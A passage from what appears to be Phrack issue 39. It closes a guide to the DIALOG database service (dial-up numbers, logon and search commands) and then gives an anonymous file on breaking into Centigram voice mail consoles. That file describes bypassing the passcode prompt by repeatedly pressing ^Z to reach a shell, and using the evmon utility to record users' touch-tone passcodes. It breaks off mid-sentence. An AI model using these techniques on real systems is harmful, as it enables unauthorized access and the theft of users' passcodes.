university libraries for this service. Of course, MANY of the more
interesting databases are not available on CD-ROM and must still be
accessed through the DIALOG network.

Access to DIALOG Services

The following on-line services are available from DIALOG Information


Services:

DIALOG
DIALOG Business (DBC)
DIALOG Medical Connection (DMC)
DIALMAIL
KNOWLEDGE INDEX

The logon procedures for the first four are identical and use the same
service address; procedures for KNOWLEDGE INDEX differ only in the use of the
KI service address, as illustrated throughout this file.

The most common method of access to DIALOG services uses local phone
numbers for three telecommunication networks: DIALOG's DIALNET, BT Tymnet,
TYMNET, and SprintNet. For those who live in an area that lacks a local dialup
for those three networks, you may use the 800 link into the DIALNET for access
to all DIALOG services except KNOWLEDGE INDEX. This access is not free, but it
may cost less than dialing long-distance to reach a network node if you live in
a region without local access. Access is also available through gateways from
other on-line systems.

Access to many DIALOG services is available from countries throughout the


world and may be accessed from their own Public Data Networks.

Dialnet 800-Number Access

The two DIALNET 800 numbers are available for connecting to Dialog services
from anywhere in the 48 contiguous states. Access through these numbers is not
free.

(800)DIALNET 300, 1200, and 2400 b. (w/MNP error checking)


(800)342-5638

(800)847-1620 VADIC 3400 series modems (1200 baud)


BELL 103 modems (300 baud)
BELL 212 modems (1200 baud)

Note: I have excluded all the dialup numbers for Tymnet and Sprintnet. If you
don't know how to find those, obtain a file on X.25 nets and I'm sure
they will be listed somewhere in them.

DIALNET U.S. DIALUP NUMBERS

(All DIALNET dialup numbers support 300, 1200, and 2400 baud)

ARIZONA
Phoenix....................................(602)257-8895
CALIFORNIA
Alhambra...................................(818)300-9000
Longbeach..................................(213)491-0803
Los Angeles................................(818)300-9000
Marina Del Rey.............................(213)305-9833
Newport Beach..............................(714)756-1969
Oakland....................................(415)633-7900
Palo Alto..................................(415)858-2461
Palo Alto..................................(415)858-2461
Palo Alto....................................(415)858-2575
Sacramento.................................(916)444-5030
San Diego..................................(619)297-8610
San Francisco..............................(415)957-5910
San Jose...................................(408)432-0590

COLORADO
Denver.....................................(303)860-9800

CONNECTICUT
Bloomfield/Hartford........................(203)242-5954
Stamford...................................(203)324-1201

DELAWARE
Wilmington.................................(302)652-1706

DISTRICT OF COLUMBIA
Washington.................................(703)359-2500

GEORGIA
Atlanta....................................(404)455-4221

ILLINOIS
Chicago....................................(312)341-1444

INDIANA
Indianapolis...............................(317)635-7259

MARYLAND
Baltimore..................................(301)234-0940

MASSACHUSETTS
Boston.....................................(617)439-7920
Lexington..................................(617)862-6240

MICHIGAN
Ann Arbor..................................(313)973-2622
Detroit....................................(313)964-1309

MINNESOTA
Minneapolis................................(612)338-0676

MISSOURI
St. Louis..................................(314)731-0122

NEW JERSEY
Lyndhurst..................................(201)460-8868
Morristown.................................(201)292-9646
Newark.....................................(201)824-1412
Piscataway.................................(201)562-9680
Princeton..................................(609)243-9550

NEW MEXICO
Albuquerque................................(505)764-9281

NEW YORK
Albany.....................................(518)458-8710
Buffalo....................................(716)896-9440
Hempstead..................................(516)489-6868
New York City..............................(212)422-0410
Rochester..................................(716)458-7300
White Plains...............................(914)328-7810

NORTH CAROLINA
Research Triangle..........................(919)549-9290

OHIO
Cincinnati.................................(513)489-3980
Cleveland..................................(216)621-3807
Columbus...................................(614)461-8348
Dayton.....................................(513)898-8878

OREGON
Portland...................................(503)228-2771

PENNSYLVANIA
Allentown..................................(215)776-2030
Philadelphia...............................(215)923-5214
Pittsburg..................................(412)471-1421
Valley Forge/Norristown....................(215)666-1500

TEXAS
Austin.....................................(512)462-9494
Dallas.....................................(214)631-9861
Houston....................................(713)531-0505

UTAH
Salt Lake City.............................(801)532-3071

VIRGINIA
Fairfax....................................(703)359-2500

WASHINGTON
Seattle....................................(206)282-5009

WISCONSIN
Milwaukee..................................(414)796-1785

Access to Dialog Outside of the US

Foreign readers may access Dialog via the INFONET PDN. The following
numbers are for those particular users.

BELGIUM
Brussels (300).............................(02)648-0710
Brussels (1200)............................(02)640-4993
DENMARK
Copenhagen (300)...........................(01)22-10-66
Copenhagen (1200)..........................(01)22-41-22
Logging in to DIALOG or KNOWLEDGE INDEX (KI)

After dialing the appropriate number and establishing the connection, you
must allow a 10-second delay and then enter the letter A (or a carriage return
or another terminal identifier from the table below) before any further
response will occur. Then, follow the remainder of the procedures show below.

DIALOG Information Services' DIALNET


-2151:01-012-
Enter Service: dialog Enter DIALOG or KI;

DIALNET: call connected


DIALOG INFORMATION SERVICES
PLEASE LOGON:
?XXXXXXXX Enter User Number

ENTER PASSWORD:
?XXXXXXXX Enter Password;

NOTE: I have researched the method of user number and password distribution
and all user numbers and passwords are generated by Dialog, BUT upon
receiving a password from DIALOG you may opt to change it. The
passwords issued from DIALOG are 8 digits long, consisting of random
alpha-numeric characters.

Once you are connected to your default service or file in DIALOG, you can then
BEGIN one of the other services; for example, to access DIALMAIL, BEGIN MAIL.

DIALNET Terminal Identifiers

Speed Identifier Terminal Type Effect


=---------------------------------------------------------------=
300 bps ENTER key PCs & CRTs Same as A
E Thermal Printers Slower
C Impact Printers Slowest
G Belt Printer Slower

1200 bps ENTER key PCs & CRTs Same as A


or G Matrix Printers Slower
2400 bps I Belt Printers Slowest

- For access in half duplex, enter a < CTRL H > after the "Enter Service:"
prompt and before entering the word "dialog" or "ki."

- Don't hit backspace if you make an error in typing "dialog" or "ki." The
result will be toggling your duplex, reason being your backspace is usually
configured to send a < CTRL H > to delete to the left of the cursor one
space.

DIALNET Messages

Message Probable Cause User Action


ERROR, RE-ENTER SERVICE Incorrect host name Check typing

ALL PORTS BUSY All DIALOG ports Try in a few min.


are temporarily in
use.

HOST DOWN DIALOG computer is Try in a few min.


not available.

HOST NOT RESPONDING DIALOG Computer Try in a few min.


difficulty

CIRCUITS BUSY DIALNET Network is Try in a few min.


temporarily busy.

DIALNET: CALL CLEARED Appears after LOGOFF


BY REQUEST to indicate connection
ENTER SERVICE: to DIALOG is broken.

DROPPED BY HOST SYSTEM Indicates a system failure


at DIALOG.

Navigating in DIALOG

To begin a search, one would enter:

BEGIN xxxx

xxxx would be the database file number. All databases found on DIALOG are
assigned file numbers. The searching protocol used to manipulate DIALOG seems
at times to be a language in itself, but it can be easily learned and mastered.

DIALOG HOMEBASE

I would advise the first-timer to jump into the DIALOG Homebase Menu,
which provides information, help, file of the month, database info and rates,
the DIALINDEX, DIALOG Training, and announcements. DIALOG also provides
subscribers with special services which include dialouts for certain area
codes. You can begin the DIALOG HOMBASE by typing:

BEGIN HOME

=-**************************************************************-=

DIALOG DATABASES

File Number Database


15 ABI/INFORM
180 Academic American Encyclopedia
43 ADTRACT
108 Aerospace Database
10,110 AGRICOLA
9 AIM/ARM
38 America:History & Life
236 American Men & Women of Science
258,259 AP NEWS
45 APTIC
112 Aquaculture
116 Aqualine
44 Aquatic Science & Fisheries ABS
56 Art Bibliographies, Modern
192 Arthur D. Little On-Line
102 ASI
285 BIOBUSINESS
287,288 Biography Master Index
5, 55
255 BIOSIS Previews
175 BLS Consumer Price Index
178 BLS Employment, Hours, and Earnings
176 BLS Producer Price Index
137 Book Review Index
470 Books In Print
256 Business Software Database
308-311
320 CA Search
50 CAB Abstracts
262 Canadian Business and Current Affairs
162 Career Placement Registry/ Experienced Personnel
163 Career Placement Reg/Student
580 CENDATA
138 Chemical Exposure
19 Chemical Industry Notes
174 Chem Regulations & Guidelines
300,301 CHEMNAME, CHEMSIS
328-331 CHEMZERO
30 CHEMSEARCH
64 Chile Abuse & Neglect
410 Chronolog Newsletter-International Edition
101 Compuserve Information Service
220-222 CLAIMS Citation
124 CLAIMS Class
242 CLAIMS Compound Registry
23-25,125
223-225 CLAIMS US Patents
123 CLAIMS Reassignment & Re-examination
219 Clinical Abstracts
164 Coffeeline
194-195 Commerce Business Daily
593 Compare Products
8 Compendex
275 The Computer Database
77 Conference Papers Index
135 Congressional Record Abstracts
271 Consumer Drug Info Fulltext
171 Criminal Justice Period Index
60 CRIS/USDA
230 DATABASE OF DATABASES
516 D&B - Dun's Market Identifiers
517 D&B - Million Dollar Directory
518 D&B - International Dun's Market Identifiers
411 DIALINDEX
200 DIALOG PUBLICATIONS
100 Disclosure II
540 Disclosure Spectrum Ownership
35 Dissertation Abstracts On-Line
103,104 DOE Energy
575 Donnelley Demographics
229 Drug Information Fulltext
139 Economic Literature Index
165 Ei Engineering Meetings
241 Electric Power Database
511 Electronic Dictionary of Education
507 Construction Directory
501 Financial Services Directory
510 Manufactures Directory
502 Professionals Directory
504-506 Retailers Directory
508,509 Services Directory
503 Wholesalers Directory
500 Electronic Yellow Pages Index
72, 73 EMBASE (Excerpta Medica)
172,173 EMBASE
114 Encyclopedia of Associations
69 Energyline
169 Energynet
40 ENVIROLINE
68 Environmental Bibliography
1 eric
54 Exceptional Child Education Resources
291 Family Resources
20 Federal Index
136 Federal Register Abstracts
265 Federal Research in Progress
196 Find/SVP Reports and studies Index
268 FINIS: Financial Industry Information Service
96 Fluidex
51 Food Science & Technology Abstracts
79 Foods Adlibra
90 Foreign Trade & Econ Abstracts
105 Foreign Traders Index
26 Foundation Directory
27 Foundation Grants Index
58 Geoarchive
89 Georef
66 GPO Monthly Catalog
166 GPO Publications Reference File
85 Grants
122 Harvard Business Review
151 Health Planning And Administration
39 Historical Abstracts
561 ICC British Company Directory
562 ICC British Financial Datasheets
189 Industry Data Sources
202 Information Science Abstracts
12, 13 INSPEC
168 Insurance Abstracts
209 International Listing Service
74 International Pharmaceutical Abstracts
545 Investext
284 IRS TAXiNFO
14 ISMEC
244 LABORLAW
36 Language & Language Behavior Abstracts
426-427 LC MARC
150 Legal Resource Index
76 Life Sciences Collection
61 LISA
647 Magazine ASAP
47 Magazine Index
75 Management Contents
234 Marquis Who's Who
235 Marquis Pro-files
239 Mathfile
546 Media General Database
152-154 MEDLINE
86 Mental Health Abstracts
232 Menu The International Software Database
32 METADEX
29 Meteor/Geoastrophysical Abstracts
233 Microcomputer Index
32 MERADEX
29 Meteor/Geoastrophysical Abstracts
233 Microcomputer Index
248 The Middle East: Abstracts and Index
249 Mideast File
71 MLA Bibliography
555 Moody's Corporate Profiles
557 Moody's Corporate News-International
556 Moody's Corporate News - U.S.
78 National Foundations
111 National Newspaper News - U.S.
21 NCJRS
211 Newsearch
46 NICEM
70 NICSEM/NIMIS
118 Nonferrous Metals Abstracts
6 NTIS
218 Nursing & Allied Health
161 Occupational Safety and Health
28 Oceanic Abstracts
170 ON-LINE Chronicle
215 ONTAP ABI/INFORM
205 ONTAP BIOSIS Previews
204 ONTAP CA SEARCH
250 ONTAP CAB Abstracts
231 ONTAP Chemname
208 ONTAP Compendex
290 ONTAP DIALINDEX
201 ONTAP ERIC
272 ONTAP Embase
213 ONTAP Inspec
247 ONTAP Magazine Index
254 ONTAP Medline
216 ONTAP PTS Promt
294 ONTAP Scisearch
207 ONTAP Social Scisearch
296 ONTAP Trademarkscan
280 ONTAP World Patents Index
49 PAIS International
240 Paperchem
243 PATLAW
257 P/E News
241 Peterson's College Database
42 Pharmaceutical News Index
57 Philosopher's Index
41 Pollution Abstracts
91 Population Bibliography
140 PsycALERT
11 PsycINFO
17 PTS Annual Reports Abstracts
80 PTS Defense Markets and Technology
18 PTS F&S Indexes 80-
98 PTS F&S Indexes 72-79
81, 83 PTS Forecasts
570 PTS MARS
16 PTS PROMPT
82, 84 PTS TIME SERIES
190 Religion Index
421-425 TEMARC
97 Rilm Abstracts
34, 87 SciSearch
94, 186 SciSearch
7 Social Scisearch
270 Soviet Science and Technology
37 Sociological Abstracts
62 SPIN
65 SSIE Current Research
132 Standard & Poor's News
133 Standard & Poor's Corporate Descriptions
526 Standard & Poor's Register-Biographical
527 Standard & Poor's Register-Corporate
113 Standards & Specifications
238 Telgen
119 Textile Technology Digest
535 Thomas Tegister On-Line
648 Trade & Industry ASAP
148 Trade & Industry Index
106,107 Trade Opportunities
226 Trademarkscan
531 Trinet Establishment Database
532 Trinet Company Database
63 TRIS
52 TSCA Initial Inventory
480 Ulrich's International Periodicals Directory
260,261 UPI NEWS
126 U.S. Exports
93 U.S. Political Science Documents
120 U.S. Public School Directory
184 Washington Post Index
117 Water Resources Abstracts
350,351 World Patents Index
67 World Textiles
185 Zoological Record

Before I continue describing the various methods of searching, DIALOG has


an on-line master index to the DIALOG databases, DIALINDEX (file 411). It is a
collection of the file indexes of most DIALOG databases (menu-driven databases
cannot be searched in DIALINDEX). DIALINDEX can be used to determine the
number of relevant records for a single query in a collection of files. The
query can be a single term, a multiple-word phrase, a prefix-coded field, or a
full logical expression of up to 240 characters. Nested terminology, proximity
operators, and truncated terms may also be used.

You can set the files you want searched by using the SET FILE command.
Like this:

BEGIN 411 (return)

SET FILE ALLNEWS (if you want the latest news on


or hack/phreak busts)
SF ALLNEWS

To scan all Subjects: SET FILES ALL

To scan specific categories:


All Science: (ALLSCIENCE)
- Agriculture & Nutrition
- Chemistry
- Computer Technology
- Energy & Environment
- Medicine & Biosciences
- Patents & Trademarks
- Science & technology
All Business: (ALLBUSINESS)
- Business Information
- Company Information
- Industry Analysis
- News
- Patents & Trademarks
All News and Current Events: (ALLNEWS)
- News
All Law & Government: (ALLLAW;ALLGOVERNMENT)
- Law & Government
- Patents & Trademarks
All Social Science & Humanities: (ALLSOCIAL;ALLHUMANITIES)
- Social Sciences & Humanities
All General Interest: (ALLGENERAL)
- Popular Information
All Reference: (ALLREFERENCE)
- Books
- Reference
All Text: (ALLTEXT)
All databases containing
complete text of:
- Journal Articles
- Encyclopedias
- Newspapers
- Newswires
All Sources: (ALLSOURCE)
- Complete Text
- Directory
- Numeric Data
All ONTAP Training Files: (ALLONTAPS)
- All On-Line Training And
Practice databases

Once you have selected a database you can now SELECT the search keyword.
You set the flag by:

SELECT term - Retrieves a set of records containing the term.


May be used with words, prefix or suffix codes, EXPAND, or
set numbers.

When defining what you are searching for you can use logical operators
such as:

OR - puts the retrieval of all search terms into one set, eliminating
duplicate records.

AND - retrieves the intersection, or overlap, of the search terms: all


terms must be in each record retrieved.

NOT - eliminates search term (or group of search terms) following it from
other search term(s).

Note: Always enter a space on either side of a logical operator.

SELECT Examples:

SELECT (BICMOS OR CMOS) AND SRAM


or
S (BICMOS OR CMOS) AND SRAM

- This would generate something like this:


138 BICMOS <- records containing BICMOS only
1378 CMOS <- records containing CMOS only
681 SRAM <- records containing SRAM only
S1 203 (BICMOS OR CMOS) AND SRAM <- this is what you
^^ wanted.
|| DIALOG names your select topic S1, S2... respectively as search its
databases to make it easier to type. The contents of S1 are 203
found records containing the keywords BICMOS, CMOS, and SRAM.
Sometimes S1 is referred to as S(tep) 1

PROXIMITY OPERATORS (Select command)

(W) Requests terms be adjacent to each other and in order


specified. -> S SOLAR(W)ENERGY
(nW) Requests terms be within (n) words of each other and in order
specified. -> S SOLAR(3W)ENERGY
(N) Requests terms be adjacent but in any order. Useful for
retrieving identical terms. -> S SOLAR(N)ENERGY
(nN) Requests terms be within (n) words of each other and in any
order. -> S SOLAR(3N)ENERGY
(F) Requests terms be in same field of same record, in any order.
-> S SOLAR(F)ENERGY
(L) Requests terms be in same descriptor unit as defined by
database. -> S SOLAR(L)ENERGY
(S) Requests terms be in same Subfield unit as defined by
database. -> S SOLAR(S)ENERGY
(C) Equivalent to logic operator AND.
-> S SOLAR(C)ENERGY

PRIORITY OF EXECUTION

Proximity operator, NOT, AND, OR

Use parentheses to specify different order of execution, e.g. SELECT (SOLAR OR


SUN) AND (ENERGY OR HEAT). Terms within parentheses are executed first.

STOP WORDS (predefined)

The following words may not be SELECTed as individual terms. The computer will
retrieve a set with zero results. They may only be replaced with proximity
operators, e.g. S GONE(2W)WIND

AN FOR THE
AND FROM TO
BY OF WITH

RESERVED WORDS AND SYMBOLS

The following words and symbols must be enclosed in quotation marks whenever
they are SELECTed as or within search terms, e.g., SELECT "OR"(W)GATE?

AND =
FROM *
NOT +
OR :
STEPS /

TRUNCATION

OPEN: any number of characters following stem.


SS EMPLOY?
RESTRICTED: only one additional character following stem.
SS HORSE? ?
RESTRICTED: maximum number of additional characters equal to
number of question marks entered. SS UNIVERS??

INTERNAL: allows character replaced by question mark to vary. One


character per question mark. SS WOM?N

BASIC INDEX FIELD SPECIFICATION (SUFFIX CODES)

Suffix codes are used to restrict retrieval to specified basic index fields of
a record. Specific fields and codes vary according to the database.

Abstract /AB
Descriptor /DE
Full Descriptor(single word) /DF
Identifier /ID
Full Identifier(single word) /IF
Title /TI
Note /NT
Section Heading /SH
Examples:

SELECT BUDGET?/TI
SELECT POP(W)TOP(W)CAN?/TI,AB
SELECT (DOLPHIN? OR PORPOISE?)/DE/ID

ADDITIONAL INDEXES (PREFIX CODES)

Prefix codes are used to search additional indexes. Specific fields and codes
vary according to the database.

Author AU=
Company Name CO=
Corporate Source CS=
Document Type DT=
Journal Name JN=
Language LA=
Publication Year PY=
Update UD=

Examples:

SELECT AU=JOHNSON, ROBERT?


SELECT LA=GERMAN
SELECT CS=(MILAN(F)ITALY)

RANGE SEARCHING

A colon is used to indicate a range of sequential entries to be retrieved in a


logical OR relationship.

Examples:

SELECT CC=64072:64078
SELECT ZP=662521:62526

LIMIT QUALIFIERS

Limit qualifiers are used in SELECT statements to limit search terms or sets to
given criteria. Specific qualifiers vary according to database.

English language documents /ENG


Major descriptor /MAJ
Patents /PAT
Human subject /HUM
Accession number range /nnnnnn-nnnnnn

Examples:

SELECT TRANSISTORS/ENG,PAT
SELECT S2/MAJ
SELECT (STRESS OR TENSION)/234567-999999

Well that's it for basic searching. Now, how to view the record you have
selected.
Note: Indexes (prefix codes) often differ from database to
database, often resulting in futile searches. One way to avoid this
is to make a trip to the local Public or University Library and look
up the blue sheets for the database you wish to query. Blue sheets
are issued by dialog as a service to their users. Blue Sheets often
contain helpful searching techniques ere to the database you are
interested in. They will also contain a list of Indexes (prefix
codes) unique to that database only.

VIEWING SEARCH RESULTS

COMMAND SUMMARY

TYPE Provides continuous on-line display of results.


T Specify set/format/range of items. If Item range is specified,
use T to view next record. May also be used with specific
accession number.

Examples: T 12/3/1-22 <- set/format/range


T 8/7 <- set/format
T 6 <- view next.(6 in this case)
T 438721 <- view record 438721

DISPLAY Provides display of results one screen at a time. Use


D PAGE for subsequent screens.
Specify set/format/range of items. If range not specified, use
D to view next record. May also be used with specific
accession number.

Examples: D 11/6/1-44 <- set/format/range


D 9/5 <- set/format
D 7 <- view next.(7 in this case)
D 637372/7 <- view record 637372/format 7

PRINT Requests that results be printed offline and mailed. Specify


set/format/range of items. If item range not specified up to
50 records will be printed. Use PR to print another 50.

Examples: PR 9/5/1-44 <- print set/format/range


PR 6/7 <- print set/format (all)
PR 14 <- print 14 only
PR 734443/5 <- print 734443 format 5 only.

PRINT TITLE xxx To specify a title(xxx) to appear on PRINTs. Title may


contain up to 70 characters. No semicolon may be used. Must
be entered in database before any other PRINT command is used.
Cancelled by next BEGIN.

Examples: PR TITLE GLOBULIN


PR TITLE QUETZAL
REPORT Extracts data from specified fields and produces tabular
format for on-line output only. Specify set/range of
items/fields. May be used with SORTED set to specify order of
entries in table. Application is database-specific.

TYPICAL FORMATS IN BIBLIOGRAPHIC FILES:

Format Number Description


1 DIALOG Accession Number
2 Full Record except Abstract
3 Bibliographic Citation
5 Full Record
6 Title
7 Bibliographic Citation and Abstract
8 Title and Indexing

NOTE: Again, the Formats differ from database to database.


See database bluesheet for specific format descriptions.

OTHER OUTPUT-RELATED COMMANDS:

PRINT CANCEL Used alone, cancels preceding PRINT command.


PR CANCEL Specify PRINT Transaction Number to cancel
PRINT- any PRINT request entered in past two hours,
PR- e.g. PRINT- P143

PRINT QUERY To view log of PRINT commands and cancellations. Add


PR QUERY DETAIL to see date, time and costs.

PRINT QUERY ACTIVE To view log of PRINT commands that may still be cancelled.
PR QUERY ACTIVE Add DETAIL to see date, time, file and costs.

SORT Sorts set of records on-line according to parameters


indicated. Varies per database. Specify set
number/range/field,sequence, e.g. SORT 4/1-55/AU,TI
Sequence assumed ascending if not specified; use D to
specify descending order. SORT parameters may be added to
end of PRINT command for offline sorting, e.g. PRINT
9/5/ALL/SD,D

SET SCREEN nn nn Sets size of screen for video display.


SET H nn H (horizontal) given first in combined command.
SET V nn V Default is 75 characters H, 40 lines V

LOGOFF Disconnects user from DIALOG system.


LOGOFF HOLD Disconnects user from DIALOG system, holds work for 10
minutes allowing RECONNECT.

OTHER COMMANDS:

DISPLAY SETS Lists all sets formed since last BEGIN command.
DS May specify range of sets, e.g. DS 10-22.

EXPLAIN Requests help messages for commands and file features.


Enter ?EXPLAIN to see complete list.

KEEP Places records indicated in special set 0. Specify


K set number/records, or accession number. Cancelled by a
BEGIN command. Also used in DIALORDER.

LIMITALL Limits all subsequent sets to criteria specified. Varies


per database.

LIMITALL/ALL Cancels previous LIMITALL command.

?LIMIT n Requests list of limit qualifiers for database n.

SEARCH*SAVE

SAVE Stores strategy permanently until deleted. Serial number


begins with S.

SAVE TEMP Stores strategy for seven days; automatically deleted.


Serial number begins with T.

SAVE SDI Stores strategy and PRINT command(s) until deleted. PRINT
command required. Automatically executes strategy against
each new update to database in which entered. Serial
number begins with D.

MAPxx Creates a Search*Save of data extracted for field xx of


MAPxx TEMP records already retrieved.

MAPxx STEPS If STEPS is used, data is formatted into separate search


statements in Search*Save.

REVIEWING SEARCH*SAVES

RECALL nnnnn Recalls Search*Save nnnnn, displaying all set-producing


commands and comment lines, without executing the search.

RECALL SAVE Displays serial numbers of all permanent SAVEs, date


entered, and number of lines.

RECALL TEMP Displays serial numbers of all temporary SAVEs, date


entered, and number of lines.

RECALL SDI Displays serial numbers of all SDIs, dates entered,


databases in which stored, and number of lines.

EXECUTING SEARCH*SAVES

EXECUTE nnnnn Executes entire strategy. Only last line is assigned a


EX nnnnn set number.

EXECUTE STEPS nnnnn Executes entire strategy. Assigns set number to each
EXS nnnnn search element. Preferred form.

EXECUTE nnnnn/x-y Executes strategy nnnnn form command line x to command line
y only. STEPS may also be used: EXS nnnnn/x-y

EXECUTE nnnnn/USER a

Executes strategy nnnnn originally entered by


user a (a=user number).
STEPS may also be used: EXS nnnnn/USER a

EXECUTE nnnnn/x-y/USER a

Executes strategy nnnnn from command line x to command line


y, originally entered by user a. STEPS may also be used:
EXS nnnnn/x-y/USER a

DELETING SEARCH*SAVES

RELEASE nnnnn Deletes search nnnnn from system.

OTHER SEARCH*SAVE OPTIONS

NAMING: A three to five alphanumerical name may be specified following the


SAVE, SAVE TEMP, and SAVE SDI commands.
Example: SAVE TEMP SOLAR

COMMENTS: An informative comment may be stored in a SEARCH*SAVE by entering an


asterisk in place of a command, followed by up to 240 characters of
"comment." The line will be saved with any SEARCH*SAVE command, and
will display in RECALL of the search.

Example: * Search for R.J.Flappjack

ON-LINE TEXT EDITOR

Any Search*Save, with the exception of an SDI, may be edited from within any
database. An SDI must be edited within the database in which the SDI is to be
stored.

EDIT To enter Editor and create new text.


EDIT xxxxx Pulls Search*Save xxxxx into Editor for editing.

LIST Displays text to be edited.


L OPTIONS:
LIST LIST 30-110
LIST ALL LIST 10,50,80
LIST /data/ Locates all lines containing data.

INSERT Adds onto end of text.


INSERT nn Inserts line nn into text.
I To return to EDIT from INSERT, enter a period on a
I nn blank line.
DELETE To delete line(s) of text.
D OPTIONS:
DELETE 10-50
DELETE 10,30-50
DELETE ALL

CHANGE To change text within a line.


C Changes only first occurrence of old text in any given line.
OPTIONS:
CHANGE 60/old/new (where 60 is line number)
CHANGE 60/old// (deletes old)
C 60//new (inserts new at beginning of line)
C 80.old.new (when text contains slash)
C /old/new (new replaces old on all lines)
C 20,40/old/new (nonsequential lines)
C 30-50/old/new (range of lines)

COPY Duplicates line# TO line#


CO OPTIONS:
COPY 100 to 255
COPY 100-150 TO 255
COPY 100,130 TO 255

MOVE Move line# TO line#


M Options same as COPY.

QUERY Produces message giving name of file, number of lines, last line
Q number.

RENUM Renumbers lines by tens unless otherwise specified.


R OPTIONS:
RENUM n (Renumbers by increments of n)

QUIT Used to leave editor ignoring session.

SAVE Used to create Search*Save strategy from edited file.


SAVE TEMP An SDI must include a PRINT command.
SAVE SDI

Enjoy the DIALOG Information Network. I've found it most interesting.


This service is a MUST if you are in college or if you just love to learn as
uch as time permits. It is a proven research tool used by R&D and university
facilities around the world, as well as a refined corporate intelligence
information gathering tool kept hidden from the general public by sheer expense
and "pseudo-complexity." With on-line databases like DIALOG available, there
is no excuse (besides lack of time) for self-education.

*****************************************************************

Brian Oblivion can be reached at Oblivion@ATDT.ORG.

Additionally, he can be reached at Black Crawling Systems/VOiD Information


Archives (for more information, e-mail Brian). RDT welcomes any questions or
comments you may have. See you at SummerCon '92.
_______________________________________________________________________________
==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 6 of 13

Centigram Voice Mail System Consoles


Proper Entry Procedure, Design Flaws, and Security Bugs

by >Unknown User<

*** Note from Phrack Staff: This file was submitted to Phrack anonymously. ***
*** The author used SMTP fake mail to send it to the Phrack e-mail address. ***
*** Phrack cannot make any claims about the validity or the source of the ***
*** information found in this article. ***

Due to more efficient task-handling and the desire for a more "Unix-like"
environment, the developers at Centigram needed for certain key functions to be
available at all times. For instance, the ^Z key acts as the "escape" key
(these can be remapped, if desired). When necessary for some applications to
use an "escape" procedure, pressing this key can, in at least a few cases,
cause a drop to shell, or /cmds/qnxsh (possibly /cmds/sh, as well, but I'm used
to seeing qnxsh). If this escape procedure was invoked during, say,
/cmds/login, the resulting drop to shell would by-pass the "Enter Passcode:"
message. And it does.

After calling the Centigram, normal procedure is to hit ^Z to activate the


terminal, followed by the entry of the remote or console passcodes, and then
proceeding with normal console activities. However, if ^Z is continually
depressed during the login sequence, the login program will abort and run
/cmds/qnxsh. The behavior may be somewhat erratic by the repeated use of the
escape key, but when the $ prompt appears, usually, it doesn't deliberately go
away without an "exit" command or a ^D. Typically, a login pattern can develop
to accommodate the erratic behavior something along the lines of: continuously
depress ^Z until $ prompt appears, hit return, possibly get "Enter Passcode:"
message, hit return, and $ prompt appears again, set proper TTY setting, and
change directory appropriately, and continue with normal console functions.

Initial STTY Setting:

I've had problems with my terminal settings not being set properly during
the above entry procedure. I can correct this by using the "stty +echo +edit"
command, and, for my terminal, all is restored. The correct values for STTY
options and keys appear to be:

Options: +echo +edit +etab +ers +edel +oflow +mapcr +hangup


break=03h esc=1Ah rub=7Fh can=18h eot=04h up=15h
down=0Ah left=08h ins=0Eh del=0Bh

The keymap, of course, can be modified as desired, but the options,


especially +edit, appear to be necessary.

Disks and Directories:

The drives and directories are set up in a remotely MessDos fashion. The
output of a "pwd" command looks similar to "4:/". "4:" represents the drive
number, and "/" is the start of the directory structure, "4:/" being the root
directory for drive 4, "3:/tmp" being the /tmp directory on drive 3, etc.
The two most important directories are 1:/cmds and 4:/cmds, which contain,
for the most part, the program files for all of the performable commands on the
system, excluding the commands written into the shell. The directory 1:/cmds
should look similar to:

$ ls
backup drel ls rm talk
chattr eo mkdir rmdir tcap
choose fdformat mount runfloppy timer
clrhouse files p search tsk
cp frel pack sh unpack
date get_boolean patch slay ws
ddump led pwd sleep zap
diff led.init qnxsh spatch
dinit login query stty

This is a display of many useful commands. chattr changes the read/write


file attributes, cp is copy, ddump dumps disk sectors in hex & ascii, led is
the line editor, p is the file print utility, and a variety of other things
that you can experiment with at your own leisure. DO NOT USE THE TALK COMMAND.
At least, be careful if you do. If you try to communicate with your own
terminal, it locks communication with the shell, and upon hangup, for some
reason, causes a major system error and system-wide reboot, which, quite
frankly, made me say, "Oops. I'm not doing that again" when I called to check
on the actual voice mailboxes, and the phone line just sat there, dead as old
wood. I was quite relieved that it came back up after a few minutes.

The other directory, 4:/cmds, is filled with more specific commands


pertaining to functions within the voice mail system itself. These programs
are actually run from within other programs to produce an easy-to-understand
menu system. Normally, this menu system is immediately run after the entry of
the remote or console passcode, but it would not be run when using the
aforementioned security bug. It can be run from the shell simply by typing the
name of the program, console.

Mounting and Initializing Drives:

The MOUNT command produces results similar to this when run without
arguments:

$ mount
Drive 1: Hard, 360k, offset = 256k, partition= Qnx
Drive 2: Floppy, 360k, p=1
Drive 3: RamDisk, 96k, partition= Qnx
Drive 4: Hard, 6.1M, offset = 616k, partition= Qnx
$tty0 = $con , Serial at 03F8
$tty1 = $term1 , Serial at 02F8
$tty2 = $term2 , Serial at 0420
$tty3 = $mdm , Serial at 0428

The hard and floppy drives are fairly self-explanatory, although I can't
explain why they appear to be so small, nor do I know where the voice
recordings go, or if this list contain all the space required for voice
storage.

The ramdisk, however, is a bit more interesting to me. The mount command
used for the above-mentioned disk 3 was:
$ mount ramdisk 3 s=96k -v

Although I'm not sure what the -v qualifier does, the rest is fairly
straight forward. I assume that the size of the drive can be greater than 96k,
although I haven't yet played with it to see how far it can go. To initialize
the drive, the following command was used:

$ dinit 3

Quite simple, really. Now, the drive is ready for use so one can "mkdir
3:/tmp" or some such and route files there as desired, or use it for whatever
purpose. If something is accidentally redirected to the console with >$cons,
you can use the line editor "led" to create a temporary file and then use the
print utility "p" to clear the console's screen by using "p filename >$cons"
where filename contains a clear screen of 25 lines, or an ANSI bomb (if
appropriate), or a full-screen DobbsHead or whatever you like.

EVMON and password collecting:

The evmon utility is responsible for informing the system manager about
the activity currently taking place within the voice mail system. Run alone,
evmon produces output similar to:

$ evmon
Type Ctrl-C to terminate.
ln 26 tt 3
ln 26 line break
ln 26 onhook
ln 28 ringing
ln 28 tt 8
ln 28 tt 7
ln 28 tt 6
ln 28 tt 2
ln 28 offhook
ln 28 tt *
ln 28 tt 2
ln 28 tt 0
ln 28 tt 3
ln 28 tt 0
ln 28 line break
ln 28 onhook
[...]

And so forth. This identifies a certain phone line, such as line 28, and a
certain action taking place on the line, such as the line ringing, going on or
offhook, etc. The "tt" stands for touch tone, and it is, of course, the tone
currently played on the line; which means that touchtone entry of passcodes can
be recorded and filed at will. In the above example, the passcode for Mailbox
